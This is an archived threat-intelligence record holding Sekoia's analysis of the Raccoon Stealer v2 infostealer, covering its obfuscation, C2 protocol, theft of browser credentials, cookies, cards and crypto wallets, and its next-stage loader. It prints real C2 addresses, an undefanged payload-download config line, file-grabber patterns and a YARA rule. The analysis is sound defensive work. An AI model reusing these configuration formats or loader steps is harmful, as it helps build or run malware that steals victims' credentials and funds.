{ "id": "9131b976-203e-49dc-8b31-0884507440e2", "created_at": "2026-04-06T00:06:26.524267Z", "updated_at": "2026-04-10T03:37:08.665556Z", "deleted_at": null, "sha1_hash": "388aaa0a4e0c0342b8d1c4bfec2a01e2967e00c7", "title": "Raccoon Stealer v2 – Part 2: In-depth analysis", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1594123, "plain_text": "Raccoon Stealer v2 – Part 2: In-depth analysis\r\nBy Pierre Le Bourhis,\u0026nbsp;Quentin Bourgue\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2022-06-29 · Archived: 2026-04-02 10:53:03 UTC\r\nTable of contents\r\nIntroduction\r\nTechnical overview\r\nRun-time dynamic Linking\r\nObfuscation techniques\r\nMutex\r\nHost checking\r\nInitial C2 communication\r\nDLLs setup\r\nHost fingerprinting\r\nConfiguration big picture\r\nStealing functions summary\r\nData extraction with sqlite3.dll\r\nData extraction with nss3.dll\r\nWlts_ extraction \r\nWallet.dat\r\nFile grabber\r\nTelegram cache investigation\r\nScreenshot capture\r\nNext stage loader\r\nCommand and Control communications summary\r\nYARA rule\r\nTargeted Browser extensions and wallets\r\nTargeted wallets\r\nTargeted browser web extensions\r\nMITRE ATT\u0026CK TTPs\r\nIntroduction\r\nRaccoon is an information-stealing malware the likes of cryptocurrency wallet stealers such as AgentTesla,\r\nFormbook, Redline, and Vidar. In March 2022, Raccoon Team announced their temporary retirement due to\r\nmissing team members related to the conflict between Ukraine and Russia that started in February 2022 on\r\ndifferent forums (i.e. xss[.]is). They also mentioned they are working on a new version of the malware.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 1 of 24\n\nThis blog post is a technical analysis of the new Raccoon Stealer 2.0 stand-alone version. Authors have announced\r\nthat the malware is also available in a DLL format or could be embedded in other PE.\r\nLink to the analyzed sample :\r\nhttps://bazaar.abuse.ch/sample/022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03/\r\nThis article follows up the first publication on Raccoon Stealer v2 to analyse in depth the malware functionalities\r\nand capabilities.\r\nTechnical overview\r\nRaccoon Stealer v2 is written in C/C++ and ASM, the standalone version is approximately 56 KB, malware\r\nobfuscates its configuration and strings. It also performs dynamic linking. Communication with its Command and\r\nControl servers occurs over HTTP; no encryption or data obfuscation is used to exchange with the attacker’s\r\nserver.\r\nRaccoon v2 targets various crypto wallets, retrieves cookies and saves credit card numbers from browsers (Edge,\r\nFirefox and Chrome).\r\nRun-time dynamic Linking\r\nThe first task performed by the malware is to link libraries functions, initially the PE initiates handles to\r\n`Shell32.dll`, `WinInt.dll`, `Crypt32.dll`, `Ole32.dll`, `User32.dll`, `Advapi32.dll` and Kernel32.dll. Contrary to\r\nother malwares of the same family, Raccoon doesn’t hide the loading of `LoadLibrary` and `GetProcAddress`\r\n[T1055.001], moreover imported functions from the various libraries are stored in clear text.\r\nFigure 1. Part of the decompiled function which executes the run-time dynamic linking\r\nObfuscation techniques\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 2 of 24\n\nOnce the functions are imported, Raccoon deobfuscates [T1140] a list of strings used to set up Command and\r\nControl communication, and exfiltration operations. This obfuscation technique is often implemented in other\r\nmalware. The obfuscated strings are RC4-encrypted [T1027] strings stored in base64. The sample used two\r\ndifferent RC4 keys, one for decrypting strings used later in the program and a second one to decrypt the list of C2.\r\nFigure 2. Example of the multiple calls to the first deobfuscation function\r\nFigure 3. Decompiled version of the RC4 algorithm used in Raccoon v2\r\nlogins.json\r\n\\autofill.txt\r\n\\cookies.txt\r\n\\passwords.txt\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 3 of 24\n\n---\r\n--\r\n*/*\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Type: multipart/form-data; boundary=\r\nContent-Type: text/plain;\r\nUser Data\r\nwallets\r\nwlts_\r\nldr_\r\nFigure 4. Extract of deobfuscated data\r\nAs mentioned in the beginning of this section, Raccoon Stealer used a different key to decrypt its Command and\r\nControl URLs; the deobfuscated values are stored in an array. This array can take up to 5 values, which we assess\r\nas a capacity of the malware to have a backup Command and Control instance to ensure resilience.\r\nFigure 5. Deobfuscation of the Command and Control with the new RC4 key\r\nThe deobfuscated C2 in the sample we analyzed is: http://51.195.166[.]184/\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 4 of 24\n\nFigure 6. CyberChef recipe to deobfuscate the C2 URLs\r\nMutex\r\nAfter the run-time dynamic linking and string deobfuscation, the stealer checks the existence of a Mutex. In the\r\nsample we analyzed, its value is 8724643052 . If the mutex already exists, the process exits, otherwise, the\r\nmalware creates it and the malware further proceeds.\r\nFigure 7. Mutex operation in Raccoon Stealer v2\r\nIt is worth noting that the mutex test is the only technique we observed in the sample that would prevent malware\r\nexecution.\r\nHost checking\r\nThe malware then checks the privileges of the running process and returns zero in case the S-I-D (Security\r\nIDentifier) is S-1-5-18 which stands for NT Authority\\System . However this function also returns zero if the\r\nprocess can neither get the token information nor convert its SID into a string type. \r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 5 of 24\n\nFigure 8. Code checking current permissions\r\nIf the process permission is not NT Authority\\System , or the process cannot get its token information, the\r\nmalware does not perform the next function that loops over the running processes [T1057]. Again, the result of\r\nthis function is not critical to the rest of the execution; the returned value is immediately erased by the next\r\ninstruction. (cf.: `mov eax, some value`).\r\nFigure 9. Malware listing running process of the infected host\r\nNb: This non-usage of the return value likely indicates that Raccoon Stealer v2 is still under development.\r\nInitial C2 communication\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 6 of 24\n\nAfter what can be considered the initiation phase, the malware begins to set up its first connection to the\r\nCommand and Control server [T1041]. \r\nFirst, it gets the MachineGuid by reading the Registry [T1012] to identify the infected host:\r\nHKLM:\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\r\nFigure 10. Fingerprinting of the MachineGuid via the Registry\r\nThen it reads the username from Adavapi32 library. \r\nFigure 11. Code used to get the username\r\nEventually, the data are concatenated with the following structure:\r\nmachineId=\u003cMachineGuid\u003e|\u003cUserName\u003e\u0026configId=\u003cRC4 key\u003e\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 7 of 24\n\nFigure 12. Host fingerprinting and Command and Control server communication\r\nThe formatted data is sent to the C2 over HTTP in a POST request at the root of the server. It is interesting to note\r\nthat the loop requests the list of previously deobfuscated C2; the malware requests every C2 in its list; the first to\r\nrespond with data is assigned as the official C2 for the next communication.\r\nThe C2 replies with a significant configuration in plain text, which contains the following information:\r\nDownloading DLLs URLs;\r\nRequested functionalities:\r\nTake a screenshot (cf.: `scrnsht_`);\r\nCache investigation of the Telegram desktop application (cf.: `tlgrm_`);\r\nNext stage setup and execution (cf.: `ldr_1`);\r\nBrowser extensions to search for (cf.: `ews_`);\r\nCryptographic Wallets of interest (cf.: `wlts_`);\r\nA token used to define the HTTP C2 endpoint for further communication.\r\nFigure 13. Extract of the configuration sent by the C2 server to infected host\r\nAll of the described configurations are not always set up; for example, screenshot capture or next stage loader are\r\noften missing, they might not be present by default.\r\nDLLs setup\r\nAs presented in the previous section, the malware retrieves information about the URLs hosting the following\r\nDLLs to be downloaded [T1105]:\r\nnss3.dll\r\nnssdbm3.dll\r\nmsvcp140.dll\r\nvcruntime140.dll\r\nmozglue.dll\r\nfreebl3.dll\r\nsoftokn3.dll\r\nsqlite3.dll\r\nThese are legitimate third-party DLLs allowing malware to collect data on the infected host.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 8 of 24\n\nFigure 14. PCAP extract of the DLLs downloading\r\nFigure 15. Decompiled code downloading the libraries\r\nAfter parsing the list of DLLs, the malware contacts another Command and Control server to download them. The\r\nDLLs are then dropped on the infected host.\r\nNote: At this stage, libraries are not loaded into memory.\r\nHost fingerprinting\r\nRaccoon fingerprints the infected host and the following information are collected [T1082]:\r\nUser CID\r\nTimeZone [T1614]\r\nOS version\r\nHost architecture\r\nCPU information\r\nRAM capacity\r\nInformation about display devices\r\nList installed applications [T1518]\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 9 of 24\n\nFigure 16. Advanced host fingerprinting\r\nAll information is gathered in a file named `System Info.txt` which is sent to the C2 server in a POST request with\r\nthe content type `application/x-object`. This time, the C2 URL changes, the token extracted from the configuration\r\n(the one received in the first HTTP response) is used as the new HTTP endpoint.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 10 of 24\n\nFigure 17. Sended packet to the C2 containing fingerprint information\r\nConfiguration big picture\r\nAs introduced in the section `C2 communication initiation`, the sample obtains a configuration with a particular\r\nstructure. Each line of the configuration, which is text-based, defines a type and how to collect information on the\r\nhost. `wlts_` and `ews_` are prefixes used in the configuration, `wlts_` stands for wallets and `ews_` for browser\r\nweb extension, as shown below by two configuration examples:\r\news_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings\r\nwlts_xmr:Monero;5;Monero\\\\wallets;*.keys;\r\nConfiguration for browser extensions is defined by three values separated by semicolon: the browser extension\r\ndirectory name, the name and the type of extension, the extension type can be `Local Extension Settings` or\r\n`IndexedDB`.\r\nConfiguration for wallets is a bit more complex. Here the values are separated by a semicolon: the first value is\r\nthe wallet name, the second value is an integer, the next values are files and/or directories pattern to search.\r\nStealing functions summary\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 11 of 24\n\nThe execution flow for the next functions is as follows (each step is detailed in the next sections of this article):\r\n1. Use sqlite3.dll to retrieve credit card information, cookies and saved passwords by browser (autofill)\r\n[T1539] [T1555.003];\r\n2. Use mozglue3.dll to get logins.json, cookies, and histories from Firefox [T1539] ;\r\n3. Parse the received configuration to search for particular crypto wallets (cf.: `wlts_` and `ews_`)[T1005];\r\n4. Search file named `wallet.dat` [T1005];\r\n5. Grab files according to the pattern set in the configuration; [optional] [T1119]\r\n6. Investigate into the Telegram Desktop cache; [optional]\r\n7. Capture a screenshot of the infected host desktop; [optional] [T1113]\r\n8. Load and execute the next stage. [optional] [T1106]\r\nFigure 18. Part of the main function doing the data theft, screenshot capture and next stage loading\r\nThe first function in charge of stealing data on the infected host loops over files to search for `User Data` (Edge\r\nand Chrome browsers) and `pera` file names. \r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 12 of 24\n\nFigure 19. Extract of the code executing the SQL queries\r\nOnce a file is found, the malware triggers the execution of a list of functions that executes sqlite queries, then their\r\nresults are parsed and formatted to be sent to the C2 server.\r\nThe next two screenshots are examples of SQL queries to get [T1539] [T1555.003]:\r\n1. cookies\r\n2. credit cards information ( holder’s name, number, expiration date)\r\nFigure 20. Example of SQL used to retrieved cookies\r\nFigure 21. Example of SQL query used to retrieve credit card numbers from Google chrome file\r\nFinally, the function will parse the retrieved configuration (eg: `ews_`) and search for the browser extensions\r\ndirectory (generally located under AppData\\Local\\Google\\User Data\\Default\\Extensions for Google Chrome) .\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 13 of 24\n\nWhen data is collected from different sources, the malware formats these data before sending them to the C2\r\nserver.\r\nInteresting observation: for each function that uses the sqlite3.dll exported functions, the malware re-assigns\r\nimports (cf.: `GetProcAddress`). A similar behavior is observed for the other downloaded DLLs.\r\nFigure 22. Reference to sqlite3 prepare_v2 function loading\r\nThe process is the same with nss3.dll, the malware is looking for particular files matching known patterns related\r\nto the web browser.\r\nThis time, it targets cookies, logins.json files and the browser history [T1539] [T1555.003].\r\nFigure 23. Other function responsible to retrieved web browser data\r\nA list of wallets to search on the infected host is sent by the C2, these wallets are prefixed by `wlts_`. The method\r\nis simple: it loops over the configuration when the first six bytes match `wlts_`, then Raccoon Stealer parses the\r\nleftover of the configuration line to search for particular file patterns. In case a pattern match, the file is copied and\r\nsent to the C2 server [T1005].\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 14 of 24\n\nFigure 24. Extract of the configuration sent by the C2 used for the wallet investigation\r\nFigure 25. Workflow of the function used to search file, copy it content and format it for the C2\r\n1. Loop over files and directories until a pattern matches\r\n2. Create a copy of the file\r\n3. Format exfiltrated data before sending them to the C2\r\nAgain, if a wallet is found, a POST HTTP request with a copy of the wallet written in-body is sent to the C2;\r\notherwise no request is made.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 15 of 24\n\nWallet.dat\r\nIn this function, Raccoon Stealer iterates the different directories to search for files named wallet.dat (ref:\r\nbitcoin wallet). No particular operation is performed against this file [T1005] [T1083].\r\nFigure 26. Extract of the code used to search wallet.dat file\r\nFile grabber\r\nIn the configuration, the malware may receive the following line:\r\ngrbr_:%USERPROFILE%\\Desktop|.*txt`|*recycle*,*windows*|20|1|1|1|files\r\nThe above configuration indicates to the malware to look for all text files ( .txt) in the desktop folder [T1083]\r\n[T1119]. No particular operation is performed on the filename or its content. In case a file matches the given\r\npattern, a copy is sent to the C2.\r\nTelegram cache investigation\r\nThe last stealing function used by Raccoon Stealer consists of investigating the Telegram Desktop cache data\r\nlocated under the `Telegram Desktop\\tdata` directory.\r\nThe related configuration line is:\r\ntlgrm_Telegram:Telegram Desktop\\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 16 of 24\n\nThe `tdata` directory of the Telegram Desktop application is used to store the application cache where valuable\r\ndata is stored, for instance session cookies.\r\nScreenshot capture\r\nAnother capability of the Raccoon Stealer is to take a screenshot and send it to the C2 server [T1113]. The figure\r\nbelow shows the process initiating the Device Context on the desktop window handler, followed by the capture of\r\nan area and its conversion into a bitmap.\r\nFigure 27. Decompiled code used to create the screenshot capture\r\nThe screenshot operation is optional in Raccoon workflow. The condition to execute this function is to receive in\r\nthe configuration the `scrnsht_` line (cf.: `scrnsht_Screenshot.jpeg|1`), where `Screenshot.jpeg` capture name will\r\nbe prefixed by `—` before being exfiltrated to the C2 server again with content type `application/x-object`.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 17 of 24\n\nFigure 28. HTTP packet containing the screenshot sent to the C2\r\nNext stage loader\r\nFinally, the malware ends up processing the configuration sent in the first HTTP response, by parsing its last line:\r\nldr_1:http://94.158.244.119/U4N9B5X5F5K2A0L4L4T5/84897964387342609301.bin|%TEMP%\\|exe\r\nThis instruction pertains to the loader configuration, whose structure is `ldr_X:URL|execution directory|PE type`.\r\nThis configuration is in charge of loading and executing the next stage [T1106] [T1407]. The payload choice is up\r\nto the actor who purchased Raccoon. In this analysis, the dropped and executed payload is a basic Trojan.\r\n`X` is an integer whose value indicates which type of loading should be used: \r\n`3` indicates to execute the payload directly (no investigation done on this case due to the lack of sample\r\nmatching this scenario);\r\n`2` is not implemented;\r\n`1` means the payload is located on a remote host and needs to be downloaded before being executed.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 18 of 24\n\nFigure 29. Loading of the next payload from a remote file and its execution with ShellExecuteW function\r\nNb: We assess that the last argument (PE type) in the configuration line likely allows Raccoon Stealer to load\r\nother binaries than executable, such as a shellcode or a DLL, that can be embedded in the Raccoon Stealer\r\nbinary.\r\nCommand and Control communications summary\r\nAfter loading and executing the next stage, Raccoon Stealer’s job is done. To sum up, see the network capture of\r\nthe analyzed sample below, that shows a typical exchange between the Command and Control server and the\r\ninfected host:\r\nFigure 30. Summary of the network communication between the infected host and the C2 with Wireshark\r\n1. Register the new infected host and retrieve the stealer configuration;\r\n2. Download DLLs;\r\n3. Send System Info.txt with host fingerprint information;\r\n4. Send stolen data (wallet(s), password(s), etc…);\r\n5. Send ---Screenshot.jpeg file;\r\n6. Download the next stage of the infection.\r\nYARA rule\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 19 of 24\n\nAs described in the obfuscation techniques section, the new version of Raccoon Stealer hides its strings and\r\nconfiguration using a very common technique (base64 encoded with RC4). The following YARA rule matches the\r\nimplemented RC4 decryption algorithm, and at least 20 occurrences, of the string deobfuscation routine.\r\nrule infostealer_win_raccoon_v2_rc4 {\r\n meta:\r\n malware = \"Raccoon\"\r\n description = \"Finds samples of the Raccoon Stealer V2 based on the RC4 decryption algorithm and the deo\r\n author = \"SEKOIA.IO\"\r\n creation_date = \"2022-06-16\"\r\n modification_date = \"2022-06-16\"\r\n strings:\r\n $rc4_opcode = {99 f7 7d fc 8b 45 10 0f be 04 02 03 c1 03 f0 81 e6 ?? ?? ?? ?? 79 08 4e 81 ce ?? ?? ?? ??\r\n $deobfuscation = {8d 4d ?? 51 50 8b ce e8 ?? ?? 00 00 8d 55 ?? a3 ?? ?? ?? ?? b9 ?? ?? ?? ?? e8 ?? ?? ff\r\n \r\n condition:\r\n $rc4_opcode and #deobfuscation \u003e 20 and filesize \u003c 70KB\r\n}\r\nConfiguration extractor\r\nThe python extraction script solely works for stand-alone PE of Raccoon Stealer v2 and it is available on the\r\nSEKOIA.IO Community Github.\r\nTargeted Browser extensions and wallets\r\nTargeted wallets\r\nBitcoin\r\nExodus\r\nAtomic\r\nJaxxLiberty\r\nBinance\r\nCoinomi\r\nElectrum\r\nElectrum-LTC\r\nElectrumCash\r\nGuarda\r\nBlockstreamGreen\r\nLedger\r\nDaedalus\r\nMyMonero\r\nMonero\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 20 of 24\n\nWasabi\r\nTargeted browser web extensions\r\nMetaMask\r\nTronLink\r\nBinanceChain\r\nRonin\r\n MetaX\r\nXDEFI\r\nWavesKeeper\r\nSolflare\r\nRabby\r\nCyanoWallet\r\nCoinbase\r\nAuroWallet\r\nKHC\r\nTezBox\r\nCoin98\r\nTemple\r\nICONex\r\nSollet\r\nCloverWallet\r\nPolymeshWallet\r\nNeoLine\r\nKeplr\r\nTerraStation\r\nLiquality\r\nSaturnWallet\r\nGuildWallet\r\nPhantom\r\nTronLink\r\nBrave\r\nMEW_CX\r\nTON\r\nGoby\r\nMITRE ATT\u0026CK TTPs\r\nTactic Technique Description\r\nDefense\r\nEvasion\r\nT1140 –\r\nDeobfuscate/Decode\r\nRaccoon Stealer 2.0 decodes strings and the C2 configuration in\r\nthe malware using RC4 and base64.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 21 of 24\n\nFiles or Information\r\nDefense\r\nEvasion\r\nT1027 – Obfuscated\r\nFiles or Information\r\nRaccoon Stealer 2.0 uses RC4-encrypted strings. \r\nCredential\r\nAccess\r\nT1539 – Steal Web\r\nSession Cookie\r\nRaccoon Stealer 2.0 harvests cookies from popular browsers.\r\nCredential\r\nAccess\r\nT1555.003 –\r\nCredentials from\r\nPassword Stores:\r\nCredentials from\r\nWeb Browsers\r\nRaccoon Stealer 2.0 collects passwords from popular browsers.\r\nDiscovery\r\nT1083 – File and\r\nDirectory Discovery\r\nRaccoon Stealer 2.0 lists files and directories to grab files through\r\nall disks.\r\nDiscovery\r\nT1057 – Process\r\nDiscovery\r\nRaccoon Stealer 2.0 lists the current running processes on the\r\nsystem.\r\nDiscovery\r\nT1012 – Query\r\nRegistry\r\nRaccoon Stealer 2.0 queries the Windows Registry key at\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid to\r\nretrieve the MachineGuid value.\r\nDiscovery\r\nT1518 – Software\r\nDiscovery\r\nRaccoon Stealer 2.0 lists all installed software for the infected\r\nmachine, by querying the Windows Registry key at\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\uninstall\r\nDiscovery\r\nT1082 – System\r\nInformation\r\nDiscovery\r\nRaccoon Stealer 2.0 collects OS version, host architecture, CPU\r\ninformation, RAM capacity and display device information.\r\nDiscovery\r\nT1614 – System\r\nTime Discovery\r\nRaccoon Stealer 2.0 collects the time zone information from the\r\nsystem.\r\nCollection\r\nT1119 – Automated\r\nCollection\r\nRaccoon Stealer 2.0 scans the disks and automatically collects\r\nfiles.\r\nCollection\r\nT1005 – Data from\r\nLocal System\r\nRaccoon Stealer 2.0 collects credentials of cryptocurrency wallets\r\nfrom the local system.\r\nCollection\r\nT1113 – Screen\r\nCapture\r\nRaccoon Stealer 2.0 captures a screenshot of the victim’s desktop.\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 22 of 24\n\nCommand\r\nand\r\nControl\r\nT1071.001 –\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nRaccoon Stealer 2.0 uses HTTP for C2 communications.\r\nCommand\r\nand\r\nControl\r\nT1041 – Exfiltration\r\nOver C2 Channel\r\nRaccoon Stealer 2.0 exfiltrates data over the C2 channel.\r\nCommand\r\nand\r\nControl\r\nT1105 – Ingress\r\nTool Transfer\r\nRaccoon Stealer 2.0 downloads legitimate third-party DLLs for\r\ndata collection onto compromised hosts.\r\nExecution T1106 – Native API\r\nRaccoon Stealer 2.0 has the ability to launch files using\r\nShellExecuteW.\r\nDefense\r\nEvasion\r\nT1055.001 –\r\nProcess\r\nInjection: Dynamic-link Library\r\nInjection\r\nRaccoon Stealer 2.0 has the ability to load DLLs via\r\nLoadLibraryW and GetProcAddress.\r\nDefense\r\nEvasion\r\nT1407 – Download\r\nNew Code at\r\nRuntime\r\nRaccoon Stealer 2.0 downloads its next stage from a remote host.\r\nThank you for reading this article. You can also read our article on:\r\nOngoing Roaming Mantis smishing campaign targeting France.\r\nBumbleBee: a new trendy loader for Initial Access Brokers.\r\nXDR vs Ransomware.\r\nChat with our team!\r\nWould you like to know more about our solutions?\r\nDo you want to discover our XDR and CTI products?\r\nDo you have a cybersecurity project in your organization?\r\nMake an appointment and meet us!\r\nRead also :\r\nCybercrime Malware Reverse\r\nShare this post:\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 23 of 24\n\nSource: https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "references": [ "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/" ], "report_names": [ "raccoon-stealer-v2-part-2-in-depth-analysis" ], "threat_actors": [ { "id": "c94cb0e9-6fa9-47e9-a286-c9c9c9b23f4a", "created_at": "2023-01-06T13:46:38.823793Z", "updated_at": "2026-04-10T02:00:03.113045Z", "deleted_at": null, "main_name": "Roaming Mantis", "aliases": [ "Roaming Mantis Group" ], "source_name": "MISPGALAXY:Roaming Mantis", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "f9bc28d0-ce98-4991-84ae-5036e5f9d4e3", "created_at": "2022-10-25T16:07:24.546437Z", "updated_at": "2026-04-10T02:00:05.029564Z", "deleted_at": null, "main_name": "Roaming Mantis", "aliases": [ "Roaming Mantis Group", "Shaoye" ], "source_name": "ETDA:Roaming Mantis", "tools": [ "MoqHao", "Roaming Mantis", "SmsSpy", "Wroba", "XLoader" ], "source_id": "ETDA", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775433986, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/388aaa0a4e0c0342b8d1c4bfec2a01e2967e00c7.pdf", "text": "https://archive.orkl.eu/388aaa0a4e0c0342b8d1c4bfec2a01e2967e00c7.txt", "img": "https://archive.orkl.eu/388aaa0a4e0c0342b8d1c4bfec2a01e2967e00c7.jpg" } }